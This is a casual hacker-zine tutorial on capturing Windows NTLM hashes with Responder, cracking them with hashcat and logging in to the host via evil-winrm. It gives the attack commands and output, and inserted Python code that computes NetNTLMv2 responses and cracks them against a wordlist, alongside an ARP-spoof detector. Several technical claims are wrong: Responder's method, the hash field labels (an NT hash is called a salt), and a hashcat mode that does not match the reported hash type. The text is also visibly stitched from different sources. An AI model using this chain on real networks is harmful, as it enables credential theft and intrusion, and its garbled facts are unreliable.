_..-----.._
                        ` - _ x X : ..-. .-.. :
                        ` - _ x X : :  : :  : :
                     /|  /  /~~~ |  /  /~~~ /~~,  //
                    / | /  /--   | /  /--  /-.-' //
                   /  |/  /__    |/  /__  /  |  .
                        ` - _ x X : :_.: :._: :
                        ` - _ x X :__..---..__:                                                                                

┌───────────────────────────────────────────────────┐
|     NTLM Hashes, Arp Poison & Cracking The Hash   |
\───────────────────────────────────────────────────/
|[0x1] What is Responder
|[0x2] How does it work?
|[0x3] Arp Poison
|[0x4] Cracking The Hash
└───────────────────────────────────────────────────┘


Hi! Today I'm going to talk to you about ARP poisoning, how to use an NTLM hash capture tool (Responder), how NTLM hash capture works, and how cracking the hash works!
I apologize for the delay in posting something new, but anyway, let's get down to business :3

[0x1] What is Responder?
Responder is a tool for performing ARP poison attacks and NTLM hash captures while on a local network.
In addition, Responder can behave like a fake DHCP server, assigning fake IP addresses to devices that request one.
The original creator, on the SpiderLabs github, archived the project in 2020, but thanks to it being open source there are updated
forks that are perfect for use, like this one: https://github.com/lgandx/Responder, which is the version officially shipped as the default tool in Kali Linux.

[0x2] How does it work?
The operation of Responder needs to be divided into several parts, as it has several functions; the one I'll mention first is the NTLM (NT LAN Manager) hash capture.
Let's start by talking about how Windows tries to access files remotely. When Windows tries to access a shared folder, such as an SMB share, it sends an authentication request to the server.
The server responds by requesting a user ID, and the user sends an NTLM hash to prove access and identity.
- And how would Responder act on this?
Well, it sits in the middle of all this, listening for the hash as it passes through the traffic :3
But how would it do that? Well, let's talk about ARP Spoofing/Poison.

[0x3] Arp Spoofing/Poison
Responder sends spoofed ARP packets to trick devices on the network into thinking that Responder's MAC address is the default gateway's address.
So everything sent on the network gets passed through this fake gateway, and Responder has control of what passes through the network.
To make it clearer, I'll show you an example below, uwu

┌───────────────────────────────────────────────────────────────────────┐
|(kitty) ---[Request]------> (Bezumiya) ----[Request]--------> (Server)|
|(kitty) <--[Response]------ (Bezumiya) <---[Response]-------- (Server)|
|(kitty) ---[Hash]---------> (Bezumiya) -------[Hash]--------> (Server)|
└───────────────────────────────────────────────────────────────────────┘

We can see that the victim, kitty, is making a simple connection to a server, and I, Bezumiya, am intercepting all the traffic of this connection, and consequently I get the user's NTLM hash.
For those unfamiliar with Windows hashes, I'll show you an example of an NTLM hash entry below:
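From the defender's side, the tell-tale sign of the diagram above is that the gateway's IP suddenly starts answering from a second MAC address. Below is an added example (my own code, not part of this write-up and not part of Responder) that parses tcpdump-style ARP reply lines and flags exactly that. The sample lines, IP addresses and MAC addresses are all constructed; the only assumption about the input is that it follows the `ARP, Reply <ip> is-at <mac>` layout tcpdump prints by default.

```python
import re
from collections import defaultdict

# Matches tcpdump's default ARP reply line, e.g.
#   10:00:09.000000 ARP, Reply 10.10.1.1 is-at de:ad:be:ef:00:99, length 28
ARP_REPLY_RE = re.compile(r"^(\S+) ARP, Reply (\d+\.\d+\.\d+\.\d+) is-at ([0-9a-fA-F:]{17})")

# Constructed sample capture; every address here is made up.
SAMPLE_LINES = [
    "10:00:01.000100 ARP, Request who-has 10.10.1.1 tell 10.10.1.16, length 28",
    "10:00:01.000300 ARP, Reply 10.10.1.1 is-at aa:bb:cc:00:00:01, length 28",
    "10:00:02.104000 ARP, Reply 10.10.1.16 is-at aa:bb:cc:00:00:16, length 28",
    "10:00:05.220000 ARP, Reply 10.10.1.1 is-at aa:bb:cc:00:00:01, length 28",
    "10:00:09.000000 ARP, Reply 10.10.1.1 is-at de:ad:be:ef:00:99, length 28",   # gateway IP now answered by a second MAC
    "10:00:10.500000 ARP, Reply 10.10.1.16 is-at aa:bb:cc:00:00:16, length 28",
    "10:00:12.000000 ARP, Reply 10.10.1.20 is-at de:ad:be:ef:00:99, length 28",  # same MAC also answers for another host
]


def parse_arp_replies(lines):
    """Yield (timestamp, ip, mac) for every ARP reply line; requests and other traffic are skipped."""
    for line in lines:
        m = ARP_REPLY_RE.match(line)
        if m:
            yield m.group(1), m.group(2), m.group(3).lower()


def find_arp_conflicts(replies, gateway_ip=None):
    """Flag two patterns: one IP answered by more than one MAC (the classic poisoning symptom,
    marked gateway=True when it hits the default gateway) and one MAC answering for several IPs
    (lower confidence: routers and VM hosts legitimately do this, so treat it as corroboration)."""
    macs_for_ip = defaultdict(list)   # ip  -> distinct MACs seen answering for it, in order
    ips_for_mac = defaultdict(list)   # mac -> distinct IPs it has claimed, in order
    alerts = []
    for ts, ip, mac in replies:
        if mac not in macs_for_ip[ip]:
            macs_for_ip[ip].append(mac)
            if len(macs_for_ip[ip]) > 1:
                alerts.append({"time": ts, "reason": "ip-claimed-by-multiple-macs", "ip": ip,
                               "first_mac": macs_for_ip[ip][0], "new_mac": mac, "gateway": ip == gateway_ip})
        if ip not in ips_for_mac[mac]:
            ips_for_mac[mac].append(ip)
            if len(ips_for_mac[mac]) > 1:
                alerts.append({"time": ts, "reason": "mac-claims-multiple-ips", "mac": mac,
                               "ips": list(ips_for_mac[mac])})
    return alerts


if __name__ == "__main__":
    for alert in find_arp_conflicts(parse_arp_replies(SAMPLE_LINES), gateway_ip="10.10.1.1"):
        print(alert)
```

On the constructed sample this raises two alerts: the gateway 10.10.1.1 being answered by a second MAC at 10:00:09, and that same MAC then also answering for 10.10.1.20. The first pattern is the one worth paging on; the second only adds confidence, because a real router or a hypervisor will answer for several IPs on a healthy network too.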

> Bezumiya:502:aad3c435b514a4eeaad3b935b51304fe:c46b9e588fa0d112de6f59fd6d58eae3:::

Looking at the whole line, let's break it down field by field:
|- Bezumiya -> is my username (obviously)
|- 502 -> is a user identifier
|- aad3c435b514a4eeaad3b935b51304fe -> that's the NTLM hash 
|- c46b9e588fa0d112de6f59fd6d58eae3 -> that's the hash salt 
\- ::: These ":" are the fields reserved for additional information

Having captured this hash, we can crack it to recover the password in plain text.

[0x4] Cracking The Hash

In this case, and in the most common case, cracking the hash is what we need in order to get a foothold on our target machine. We can crack it using hashcat, john, or other tools; the example here uses hashcat.
Hashcat is a tool for breaking hashes using wordlists and CPU/GPU processing, and it is widely used for password cracking attacks. Now I'm going to show you how it works on our hash below.

┌─────────────────────────────────────────────────────────────────────────────────────────────────────┐
|bezumiya@x00r:~$ hashcat -m 1000 -o cracked_ntlm.txt hash_ntlm.txt /usr/share/wordlists/rockyou.txt
|hashcat (v5.1.0) starting...
| //a lot of text from the hashcat output
|Session..........: hashcat
|Status...........: Cracked
|Hash.Type........: NetNTLMv2
|Hash.Target......: bezumiya::502:56d4c27f***c9e4f:10137BD6CFB5E...000000
|Time.Started.....: Wed Feb 12 00:11:01 2020 (0 secs)
|Time.Estimated...: Wed Feb 12 00:11:01 2020 (0 secs)
|Guess.Base.......: File (rockyou.txt)
|Guess.Queue......: 1/1 (100.00%)
|Speed.#1.........:  1786.3 kH/s (8.29ms) @ Accel:256 Loops:1 Thr:64 Vec:1
|Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
|Progress.........: 32768/14344386 (0.23%)
|Rejected.........: 0/32768 (0.00%)
|Restore.Point....: 0/14344386 (0.00%)
|Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
|Candidates.#1....: 123456 -> elenutza
|Hardware.Mon.#1..: Temp: 48c
└─────────────────────────────────────────────────────────────────────────────────────────────────────┘
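To show why a captured hash can be cracked offline in the first place (0x2) and what hashcat is actually doing in the run above (0x4), here is an added example in Python. It is my own code, not from this post and not from hashcat or Responder. It implements the NT hash (MD4 over the UTF-16LE password), the NetNTLMv2 response from MS-NLMP, renders a capture in the `user::domain:challenge:proof:blob` layout that hashcat's NetNTLMv2 mode (-m 5600) consumes, and then verifies wordlist guesses against it. MD4 is written out by hand because many OpenSSL 3 builds of Python's hashlib have it disabled. The user, domain, challenge, blob, wordlist and password are all constructed sample values.

```python
import hashlib
import hmac
import struct


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). NTLM still depends on MD4 for the NT hash."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", len(data) * 8)          # message bit length, little-endian
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (
        (F, list(range(16)), (3, 7, 11, 19), 0),
        (G, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
        (H, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
    )
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for func, ks, shifts, const in rounds:
            for i, k in enumerate(ks):
                a = _lrot((a + func(b, c, d) + X[k] + const) & 0xFFFFFFFF, shifts[i % 4])
                a, b, c, d = d, a, b, c            # rotate registers for the next step
        state = [(s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash: MD4 of the UTF-16LE password, with no salt at all."""
    return md4(password.encode("utf-16le"))


def ntlmv2_hash(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2 from MS-NLMP: HMAC-MD5 keyed by the NT hash over UPPER(user)+domain in UTF-16LE."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def netntlmv2_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr, the 16 bytes the client actually sends: HMAC-MD5 keyed by NTOWFv2 over challenge + blob."""
    return hmac.new(ntlmv2_hash(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def make_capture_line(user, domain, password, server_challenge, blob):
    """Render a capture the way hashcat -m 5600 expects it: user::domain:challenge:proof:blob."""
    proof = netntlmv2_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack_netntlmv2(capture_line, wordlist):
    """Offline verification of guesses: recompute the proof for each candidate and compare.
    Returns the matching password, or None if nothing in the wordlist matches."""
    user, _, domain, chal_hex, proof_hex, blob_hex = capture_line.split(":")
    chal, blob, target = bytes.fromhex(chal_hex), bytes.fromhex(blob_hex), bytes.fromhex(proof_hex)
    for candidate in wordlist:
        if hmac.compare_digest(netntlmv2_proof(candidate, user, domain, chal, blob), target):
            return candidate
    return None


# Constructed sample values (not taken from any real capture).
SAMPLE_CHALLENGE = bytes.fromhex("1122334455667788")
SAMPLE_BLOB = bytes.fromhex("0101000000000000" + "00" * 8 + "0a0b0c0d0e0f1011" + "00" * 4)
SAMPLE_PASSWORD = "1l0v3y0u"
SAMPLE_CAPTURE = make_capture_line("kitty", "WORKGROUP", SAMPLE_PASSWORD, SAMPLE_CHALLENGE, SAMPLE_BLOB)
SAMPLE_WORDLIST = ["123456", "password", "1l0v3y0u", "elenutza"]

if __name__ == "__main__":
    print("NT hash of 'password':", nt_hash("password").hex())
    print("capture line:", SAMPLE_CAPTURE)
    print("recovered:", crack_netntlmv2(SAMPLE_CAPTURE, SAMPLE_WORDLIST))
```

The point the code makes: every value in the capture except the password is sent in the clear, and the proof is a plain HMAC keyed by something derived only from the password, so a single captured exchange lets anyone check guesses at wordlist speed with no further contact with the server. That is the whole reason password length and blocking the name-resolution poisoning in the first place matter more than anything done after the capture.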

Then we have our cracked hash in cracked_ntlm.txt. Now that we have the password in plain text, we can log in over RDP/SMB/WinRM to do something; in this case I'm going to use WinRM to connect to the host.

┌─────────────────────────────────────────────────────────────────────────────────────────────────────┐
|bezumiya@x00r:~$ evil-winrm -i 10.10.1.16 -u bezumiya -p 1l0v3y0u
|Evil-WinRM shell v3.5
| 
|Info: Establishing connection to remote endpoint
| 
|*Evil-WinRM* PS C:\Users\bezumiya\Documents>
└─────────────────────────────────────────────────────────────────────────────────────────────────────┘

This is just the beginning. There are many ways to log in to other PCs on the same network; one example I'll give you will be pass the hash, which I'll talk about soon.

So that's it. I hope you'll stay and read more of my writing; if you have anything to say or tips to make me better, call me on Discord... anything, I'm always willing to help and to listen.

thx for reading this trash <3